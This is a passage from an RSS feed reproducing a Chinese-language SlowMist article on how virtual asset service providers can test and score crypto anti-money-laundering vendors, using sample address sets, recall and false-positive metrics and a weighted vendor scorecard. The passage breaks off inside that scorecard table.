<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=a0a09dcd&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU4ODQ3NTM2OA%3D%3D%26mid%3D2247504627%26idx%3D1%26sn%3D9669acd8ecce92eccc5a6c188286510c">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 10 Apr 2026 12:00:00 +0800</pubDate>
    </item>
    <item>
      <title>慢雾：如何评估加密反洗钱工具的有效性</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504616&amp;idx=1&amp;sn=95677483334baedb3127bdc0911fa2f8</link>
      <description>本文将分析导致不同 AML 供应商系统中的风险判定存在差异的原因，并介绍一套标准化评估方法，帮助虚拟资产服务提供商自主测试来选择合适的供应商。</description>
      <content:encoded><![CDATA[<p>原创 <span>慢雾 AML 团队</span> <span>2026-04-02 12:01</span> <span style="display: inline-block;">中国香港</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=807fc71a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F8z8bibAexaCKbLcdh8o8QxiaRpme9ate1AecUQ4ic1zn22ntXCPN9vRM46ZMzyseeh76wKHicOoWlCpPOBxXjqHiaeTSTb59dmGMg8IDPGibt3lVs%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>本文将分析导致不同 AML 供应商系统中的风险判定存在差异的原因，并介绍一套标准化评估方法，帮助虚拟资产服务提供商自主测试来选择合适的供应商。</p>
  <p><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">过去几年，虚拟资产服务提供商(VASP) 在反洗钱(AML) 领域面临的核心问题，已经悄然发生变化。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">早期，行业更关注“是否已经部署 AML 能力”；而现在，一个更现实的问题摆在面前——这些能力，是否真正达到了监管可以接受的标准。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504454&amp;idx=1&amp;sn=27742de4ac090d63ca765483be9723e3&amp;scene=21#wechat_redirect" textvalue="过去的一年里" data-itemshowtype="0" linktype="text" data-linktype="2"><span textstyle="" style="font-weight: normal;">过去的一年里</span></a><span textstyle="" style="font-weight: normal;">，这种变化变得更加明显。多起处罚案例释放出同一信号：在结果导向的执法框架下，“已经投入但效果不足”，与“未采取措施”，在问责层面并不会被严格区分。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">换句话说，监管并不关心你“有没有做”，而更关注你“有没有做到”。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">这也意味着，AML 工具的评估，不再只是功能层面的对比，而需要回到一个更本质的问题：这些工具，能否在真实链上环境中识别风险？</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">基于此，本文将分析导致不同 AML 供应商系统中的风险判定存在差异的原因，并介绍一套标准化评估方法，帮助虚拟资产服务提供商自主测试来选择合适的供应商。</span></span></p><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: normal;"><span textstyle="" style="font-size: 24px;font-weight: bold;">名单之外的风险</span></span></h1><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在很多合规流程中，制裁名单和黑名单筛查依然是基础能力。但如果把评估停留在这一层，很容易产生一种“系统已经覆盖风险”的错觉。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">以 OFAC 为例，其公开名单本质上是“已确认风险”的集合，但现实中的风险远不止于此。大量未被列入名单的地址，仍可能通过控制关系或资金往来，与受制裁实体产生关联。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">如果一个工具只能识别“已经被标记的风险”，那它在实际业务中的价值是有限的。更关键的问题在于它能不能识别那些还没有被写进制裁名单里的风险。</span></span></p><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: normal;"><span textstyle="" style="font-size: 24px;font-weight: bold;">为什么结果不同</span></span></h1><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在实际选型过程中，一个非常常见的现象是：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">同一地址，在不同 AML 供应商系统中的风险判定，可能完全不同。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">这种差异通常不是偶然，而是源于底层能力的差别 —— 数据从哪里来，更新是否及时，标签如何生成，模型如何计算风险，以及系统是否具备对资金路径进行分析和穿透的能力。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">当这些因素发生变化时，呈现给用户的风险判定，自然也会不同。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">问题在于，在缺乏统一评估方法的情况下，这些差异很难通过产品演示或功能清单体现出来。你看到的是功能描述，而不是实际效果。</span></span></p><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img js_insertlocalimg" data-aistatus="1" data-imgfileid="100020966" data-ratio="0.6037037037037037" data-s="300,640" type="block" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=4a195239&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCKtVU6lRtWYR6TwHrIIwEomFEVqfW8pcOfvK1ljQLL4V9WJRicHibudn9AI7rtRMfiaeNib6O3hbWRDoHyM7YX4KVDBcBzcQ0uFG00%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">也正是基于这一现实问题，慢雾(SlowMist) 结合长期威胁情报积累与反洗钱追踪经验，整理了《Crypto AML 供应商评估 Checklist 与执行指南》。该指南参考 FATF、Wolfsberg Group，以及 FinCEN、HKMA、MAS 等监管要求，尝试提供一套既符合监管逻辑、又能够落地执行的评估方法。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">本文将对评估思路进行简要说明。完整执行方法，可通过以下链接获取：</span></span><span style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><a href="https://github.com/slowmist/crypto-aml-vendor-evaluation" target="_blank">https://github.com/slowmist/crypto-aml-vendor-evaluation</a></span></span></span></p><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: normal;"><span textstyle="" style="font-size: 24px;font-weight: bold;">用实测检验能力</span></span></h1><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">很多团队在选型 AML 工具时，会停留在两个阶段：看 Demo，或者对比功能列表。可问题在于，这两种方式展示的，往往是产品的“能力上限”，而不是它在真实环境中的表现。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在实际反洗钱场景中，真正影响判断结果的，是一些更细节但更关键的因素：数据是否足够新足够丰富、标签是否持续更新、风险是否能够随着资金路径传导，以及模型在复杂场景下是否稳定。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">而这些问题，不测试，是难以得出准确结果的。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在过往的安全分析中，我们反复看到一种情况：某些地址没有出现在任何公开制裁名单中，但其资金路径已经与高风险实体产生明确关联。在部分系统中，这类地址仍然被标记为“低风险”。从系统角度看，一切正常；但从风险角度看，关键问题已经被遗漏。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">这也是为什么，单纯依赖名单命中，已经不足以支撑当前的合规要求。真正需要验证的，是工具是否具备识别关联地址、还原资金路径，以及判断多跳间接风险的能力。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">基于这些经验，这份指南给出的核心思路其实很简单：用数据去“反推”工具的真实能力。通过标准化评估方法对供应商进行实测，将原本依赖主观判断的选型过程，转化为可量化的决策过程。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">你可以准备一小组地址，例如 20 到 50 个，包含三种类型：已知的高风险地址、明确安全的地址，以及介于两者之间的灰度地址。然后把这些地址分别输入不同的 AML 系统，记录每一个系统给出的风险判断结果。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">做完这一轮，通常会看到几个很直观的差异：哪些高风险地址没有被识别出来，哪些正常地址被误判为风险，以及灰度地址在不同系统中的风险分层是否合理。</span></span></p><table><tbody><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">指标</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">含义</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">风险影响</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">Recall（召回率）</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">识别已知高风险地址的能力</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">漏报风险</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">False Positive（误报率）</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">将安全地址误判为风险的比例</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">审核成本与业务影响</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">灰度识别能力</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">对非明确违法行为的识别能力</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">风险分层能力</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">穿透分析能力</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">多跳路径中的风险识别能力</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">间接风险暴露</span></span></p></td></tr></tbody></table><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">如果希望进一步验证工具在真实环境中的表现，可以在链上模拟一些典型交易行为，比如刻意拆分金额的结构化转账、与混币合约的交互，或者经过多跳路径再进入目标地址的资金流动。观察系统的警报延迟、风险是否能够沿路径传导、规则是否支持灵活配置，以及 API 的响应速度和稳定性，这些都会直接反映出工具的实战能力。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在完成测试后，可以基于以下评估维度进行打分：</span></span></p><table style="min-width:215px;"><tbody><tr><td data-colwidth="115"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">评估维度</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">权重</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">供应商 A 得分 (1-10)</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">供应商 B 得分 (1-10)</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">备注</span></span></p></td></tr><tr><td data-colwidth="115"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, 